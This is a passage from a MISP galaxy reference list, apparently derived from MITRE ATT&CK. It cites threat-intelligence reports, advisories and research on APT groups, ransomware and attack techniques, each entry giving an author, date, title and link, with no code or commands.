The tag is: misp-galaxy:references="Kaspersky ProjectSauron Full Report"

Table 15717. Table References

Links

https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf

McMillan Pwn March 2012

Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="McMillan Pwn March 2012"

Table 15718. Table References

Links

https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/

FireEye Application Shimming

Ballenthin, W., Tomczak, J. (2015). The Real Shim Shady. Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye Application Shimming"

Table 15719. Table References

Links

http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf

Kaspersky Regin

Kaspersky Lab’s Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.

The tag is: misp-galaxy:references="Kaspersky Regin"

Table 15720. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf

The Remote Framebuffer Protocol

Richardson, J. Levine, RealVNC Ltd. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="The Remote Framebuffer Protocol"

Table 15721. Table References

Links

https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2

Malwarebytes Heroku Skimmers

Jérôme Segura. (2019, December 4). There’s an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Malwarebytes Heroku Skimmers"

Table 15722. Table References

Links

https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku

ELC Extended Attributes

Howard Oakley. (2020, October 24). There’s more to files than data: Extended Attributes. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="ELC Extended Attributes"

Table 15723. Table References

Links

https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/

FireEye WMI SANS 2015

Devon Kerr. (2015). There’s Something About WMI. Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye WMI SANS 2015"

Table 15724. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

Nviso Spoof Command Line 2020

Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Nviso Spoof Command Line 2020"

Table 15725. Table References

Links

https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/

Zscaler Higaisa 2020

Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="Zscaler Higaisa 2020"

Table 15726. Table References

Links

https://www.zscaler.com/blogs/security-research/return-higaisa-apt

Check Point Research Rhysida August 08 2023

Check Point Research. (2023, August 8). The Rhysida Ransomware: Activity Analysis and Ties to Vice Society. Retrieved August 11, 2023.

The tag is: misp-galaxy:references="Check Point Research Rhysida August 08 2023"

Table 15727. Table References

Links

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

DigiTrust Agent Tesla Jan 2017

The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="DigiTrust Agent Tesla Jan 2017"

Table 15728. Table References

Links

https://www.digitrustgroup.com/agent-tesla-keylogger/

ATT QakBot April 2021

Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="ATT QakBot April 2021"

Table 15729. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot

ESET Telebots Dec 2016

Cherepanov, A. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="ESET Telebots Dec 2016"

Table 15730. Table References

Links

https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

SEI SSL Inspection Risks

Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.

The tag is: misp-galaxy:references="SEI SSL Inspection Risks"

Table 15731. Table References

Links

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

SourceForge rkhunter

Rootkit Hunter Project. (2018, February 20). The Rootkit Hunter project. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="SourceForge rkhunter"

Table 15732. Table References

Links

http://rkhunter.sourceforge.net

Campbell 2014

Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Campbell 2014"

Table 15733. Table References

Links

http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf

Proofpoint Domain Shadowing

Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Proofpoint Domain Shadowing"

Table 15734. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows

Symantec Shamoon 2012

Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Symantec Shamoon 2012"

Table 15735. Table References

Links

https://www.symantec.com/connect/blogs/shamoon-attacks

Spring Dragon Jun 2015

Baumgartner, K. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Spring Dragon Jun 2015"

Table 15736. Table References

Links

https://securelist.com/the-spring-dragon-apt/70726/

Check Point APT31 February 2021

Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Check Point APT31 February 2021"

Table 15737. Table References

Links

https://research.checkpoint.com/2021/the-story-of-jian/

UCF STIG Elevation Account Enumeration

UCF. (n.d.). The system must require username and password to elevate a running application. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="UCF STIG Elevation Account Enumeration"

Table 15738. Table References

Links

https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077

TrendMicro Taidoor

Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="TrendMicro Taidoor"

Table 15739. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf

SpectorOPs SettingContent-ms Jun 2018

Nelson, M. (2018, June 11). The Tale of SettingContent-ms Files. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="SpectorOPs SettingContent-ms Jun 2018"

Table 15740. Table References

Links

https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

Securelist Brazilian Banking Malware July 2020

GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.

The tag is: misp-galaxy:references="Securelist Brazilian Banking Malware July 2020"

Table 15741. Table References

Links

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

Symantec Trojan.Hydraq Jan 2010

Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.

The tag is: misp-galaxy:references="Symantec Trojan.Hydraq Jan 2010"

Table 15742. Table References

Links

https://www.symantec.com/connect/blogs/trojanhydraq-incident

Fidelis Turbo

Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016.

The tag is: misp-galaxy:references="Fidelis Turbo"

Table 15743. Table References

Links

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf

USDOJ Sandworm Feb 2020

Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="USDOJ Sandworm Feb 2020"

Table 15744. Table References

Links

https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html

Securelist Ventir

Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Securelist Ventir"

Table 15745. Table References

Links

https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/

Symantec Waterbug

Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.

The tag is: misp-galaxy:references="Symantec Waterbug"

Table 15746. Table References

Links

https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1

Windows NT Command Shell

Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Windows NT Command Shell"

Table 15747. Table References

Links

https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120

Malwarebytes The Windows Vault

Arntz, P. (2016, March 30). The Windows Vault. Retrieved November 23, 2020.

The tag is: misp-galaxy:references="Malwarebytes The Windows Vault"

Table 15748. Table References

Links

https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/

Microsoft JScript 2007

Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript …. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="Microsoft JScript 2007"

Table 15749. Table References

Links

https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript

ntlm_relaying_kerberos_del

Mollema, D. (2019, March 4). The worst of both worlds: Combining NTLM Relaying and Kerberos delegation. Retrieved August 15, 2022.

The tag is: misp-galaxy:references="ntlm_relaying_kerberos_del"

Table 15750. Table References

Links

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

trendmicro xcsset xcode project 2020

Mac Threat Response, Mobile Research Team. (2020, August 13). The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="trendmicro xcsset xcode project 2020"

Table 15751. Table References

Links

https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf

Sophos New Ryuk Attack October 2020

Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.

The tag is: misp-galaxy:references="Sophos New Ryuk Attack October 2020"

Table 15752. Table References

Links

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

RSA EU12 They’re Inside

Rivner, U., Schwartz, E. (2012). They’re Inside… Now What? Retrieved November 25, 2016.

The tag is: misp-galaxy:references="RSA EU12 They’re Inside"

Table 15753. Table References

Links

https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf

APT29 Deep Look at Credential Roaming

Thibault Van Geluwe De Berlaere. (2022, November 8). They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming. Retrieved November 9, 2022.

The tag is: misp-galaxy:references="APT29 Deep Look at Credential Roaming"

Table 15754. Table References

Links

https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming

ZDNet Ransomware Backups 2020

Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="ZDNet Ransomware Backups 2020"

Table 15755. Table References

Links

https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/

Microsoft Unidentified Dec 2018

Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="Microsoft Unidentified Dec 2018"

Table 15756. Table References

Links

https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

iPhone Charging Cable Hack

Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="iPhone Charging Cable Hack"

Table 15757. Table References

Links

https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/

Mandiant APT41 Global Intrusion

Glyer, C., Perez, D., Jones, S., Miller, S. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="Mandiant APT41 Global Intrusion"

Table 15758. Table References

Links

https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits

FireEye APT41 March 2020

Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="FireEye APT41 March 2020"

Table 15759. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

Proofpoint Bumblebee April 2022

Merriman, K. and Trouerbach, P. (2022, April 28). This isn’t Optimus Prime’s Bumblebee but it’s Still Transforming. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="Proofpoint Bumblebee April 2022"

Table 15760. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

Code Injection on Linux and macOS

Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Code Injection on Linux and macOS"

Table 15761. Table References

Links

https://www.datawire.io/code-injection-on-linux-and-macos/

FireEye Fin8 May 2016

Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="FireEye Fin8 May 2016"

Table 15762. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

Proofpoint TA407 September 2019

Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Proofpoint TA407 September 2019"

Table 15763. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

Proofpoint TA505 Sep 2017

Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 Sep 2017"

Table 15764. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter

U.S. CISA CVE-2023-3519 Exploits

Cybersecurity and Infrastructure Security Agency. (2023, July 20). Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells. Retrieved July 24, 2023.

The tag is: misp-galaxy:references="U.S. CISA CVE-2023-3519 Exploits"

Table 15765. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a

U.S. CISA CVE-2023-35078 Exploits

Cybersecurity and Infrastructure Security Agency. (2023, August 1). Threat Actors Exploiting Ivanti EPMM Vulnerabilities. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="U.S. CISA CVE-2023-35078 Exploits"

Table 15766. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a

U.S. CISA Ivanti Exploits February 2024

Cybersecurity and Infrastructure Security Agency. (2024, February 29). Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways. Retrieved March 1, 2024.

The tag is: misp-galaxy:references="U.S. CISA Ivanti Exploits February 2024"

Table 15767. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b

Atlas SEO

Atlas Cybersecurity. (2021, April 19). Threat Actors use Search-Engine-Optimization Tactics to Redirect Traffic and Install Malware. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Atlas SEO"

Table 15768. Table References

Links

https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/

Cybereason TA505 April 2019

Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Cybereason TA505 April 2019"

Table 15769. Table References

Links

https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware

Cisco CaddyWiper March 2022

Malhotra, A. (2022, March 15). Threat Advisory: CaddyWiper. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="Cisco CaddyWiper March 2022"

Table 15770. Table References

Links

https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html

Carbon Black Squiblydoo Apr 2016

Nolen, R. et al. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Carbon Black Squiblydoo Apr 2016"

Table 15771. Table References

Links

https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/

Aqua Build Images on Hosts

Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Aqua Build Images on Hosts"

Table 15772. Table References

Links

https://blog.aquasec.com/malicious-container-image-docker-container-host

Aqua Kinsing April 2020

Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Aqua Kinsing April 2020"

Table 15773. Table References

Links

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

Palo Alto Networks Black Basta August 2022

Elsad, A. (2022, August 25). Threat Assessment: Black Basta Ransomware. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Palo Alto Networks Black Basta August 2022"

Table 15774. Table References

Links

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware

Unit42 Clop April 2021

Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021.

The tag is: misp-galaxy:references="Unit42 Clop April 2021"

Table 15775. Table References

Links

https://unit42.paloaltonetworks.com/clop-ransomware/

Palo Alto Unit 42 EKANS

Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.

The tag is: misp-galaxy:references="Palo Alto Unit 42 EKANS"

Table 15776. Table References

Links

https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/

UNIT 42 LAPSUS Mar 2022

UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. Retrieved May 17, 2022.

The tag is: misp-galaxy:references="UNIT 42 LAPSUS Mar 2022"

Table 15777. Table References

Links

https://unit42.paloaltonetworks.com/lapsus-group/

Unit 42 WhisperGate January 2022

Falcone, R. et al. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Unit 42 WhisperGate January 2022"

Table 15778. Table References

Links

https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/#whispergate-malware-family

Unit 42 DGA Feb 2019

Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.

The tag is: misp-galaxy:references="Unit 42 DGA Feb 2019"

Table 15779. Table References

Links

https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/

Dell TG-3390

Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.

The tag is: misp-galaxy:references="Dell TG-3390"

Table 15780. Table References

Links

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

SecureWorks TG-4127

SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="SecureWorks TG-4127"

Table 15781. Table References

Links

https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign

McAfee APT28 DDE1 Nov 2017

Sherstobitoff, R., Rea, M. (2017, November 7). Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="McAfee APT28 DDE1 Nov 2017"

Table 15782. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/

Awake Security Avaddon

Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Awake Security Avaddon"

Table 15783. Table References

Links

https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/

Awake Security C2 Cloud

Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Awake Security C2 Cloud"

Table 15784. Table References

Links

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

Detecting Command & Control in the Cloud

Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="Detecting Command & Control in the Cloud"

Table 15785. Table References

Links

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

Threat Matrix for Kubernetes

Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Threat Matrix for Kubernetes"

Table 15786. Table References

Links

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

SecureWorks BRONZE MOHAWK n.d.

SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="SecureWorks BRONZE MOHAWK n.d."

Table 15787. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

ESET T3 Threat Report 2021

ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022.

The tag is: misp-galaxy:references="ESET T3 Threat Report 2021"

Table 15788. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf

BlackBerry Amadey 2020

Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="BlackBerry Amadey 2020"

Table 15789. Table References

Links

https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot

CiscoAngler

Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="CiscoAngler"

Table 15790. Table References

Links

https://blogs.cisco.com/security/talos/angler-domain-shadowing

Talos IPFS 2022

Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Talos IPFS 2022"

Table 15791. Table References

Links

https://blog.talosintelligence.com/ipfs-abuse/

Cisco Group 72

Esler, J., Lee, M., and Williams, C. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Cisco Group 72"

Table 15792. Table References

Links

http://blogs.cisco.com/security/talos/threat-spotlight-group-72

Talos ZxShell Oct 2014

Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.

The tag is: misp-galaxy:references="Talos ZxShell Oct 2014"

Table 15793. Table References

Links

https://blogs.cisco.com/security/talos/opening-zxshell

Infinitum IT LockBit 3.0

Infinitum IT. (n.d.). Threat Spotlight: Lockbit Black 3.0 Ransomware. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Infinitum IT LockBit 3.0"

Table 15794. Table References

Links

https://raw.githubusercontent.com/whichbuffer/Lockbit-Black-3.0/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf

BlackBerry SystemBC June 10 2021

The BlackBerry Research & Intelligence Team. (2021, June 10). Threat Thursday: SystemBC – a RAT in the Pipeline. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="BlackBerry SystemBC June 10 2021"

Table 15795. Table References

Links

https://blogs.blackberry.com/en/2021/06/threat-thursday-systembc-a-rat-in-the-pipeline

DOJ North Korea Indictment Feb 2021

Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.

The tag is: misp-galaxy:references="DOJ North Korea Indictment Feb 2021"

Table 15796. Table References

Links

https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and

Symantec Thrip June 2018

Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="Symantec Thrip June 2018"

Table 15797. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

FireEye Bootkits

Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.

The tag is: misp-galaxy:references="FireEye Bootkits"

Table 15798. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

SpecterOps AWS Traffic Mirroring

Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="SpecterOps AWS Traffic Mirroring"

Table 15799. Table References

Links

https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512

Ossmann Star Feb 2011

Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Ossmann Star Feb 2011"

Table 15800. Table References

Links

https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html

Symantec Tick Apr 2016

DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Symantec Tick Apr 2016"

Table 15801. Table References

Links

https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

TightVNC Software Project Page

TightVNC Software. (n.d.). TightVNC Software. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="TightVNC Software Project Page"

Table 15802. Table References

Links

https://www.tightvnc.com/

AnyRun TimeBomb

Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="AnyRun TimeBomb"

Table 15803. Table References

Links

https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/

Microsoft TimeProvider

Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Microsoft TimeProvider"

Table 15804. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

Talos TinyTurla September 2021

Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.

The tag is: misp-galaxy:references="Talos TinyTurla September 2021"

Table 15805. Table References

Links

https://blog.talosintelligence.com/2021/09/tinyturla.html

Pentestlab Token Manipulation

netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Pentestlab Token Manipulation"

Table 15806. Table References

Links

https://pentestlab.blog/2017/04/03/token-manipulation/

Langer Stuxnet

Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet’s Creators Tried to Achieve. Retrieved December 7, 2020.

The tag is: misp-galaxy:references="Langer Stuxnet"

Table 15807. Table References

Links

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

TrendMicro Tonto Team October 2020

Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="TrendMicro Tonto Team October 2020"

Table 15808. Table References

Links

https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf

NorthSec 2015 GData Uroburos Tools

Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.

The tag is: misp-galaxy:references="NorthSec 2015 GData Uroburos Tools"

Table 15809. Table References

Links

https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html

Dingledine Tor The Second-Generation Onion Router

Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Dingledine Tor The Second-Generation Onion Router"

Table 15810. Table References

Links

http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf

FireEye FIN7 Shim Databases

Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.

The tag is: misp-galaxy:references="FireEye FIN7 Shim Databases"

Table 15811. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

LOLBAS Tracker

LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Tracker"

Table 15812. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/

BushidoToken Scattered Spider August 16 2023

BushidoToken. (2023, August 16). Tracking Adversaries: Scattered Spider, the BlackCat affiliate. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="BushidoToken Scattered Spider August 16 2023"

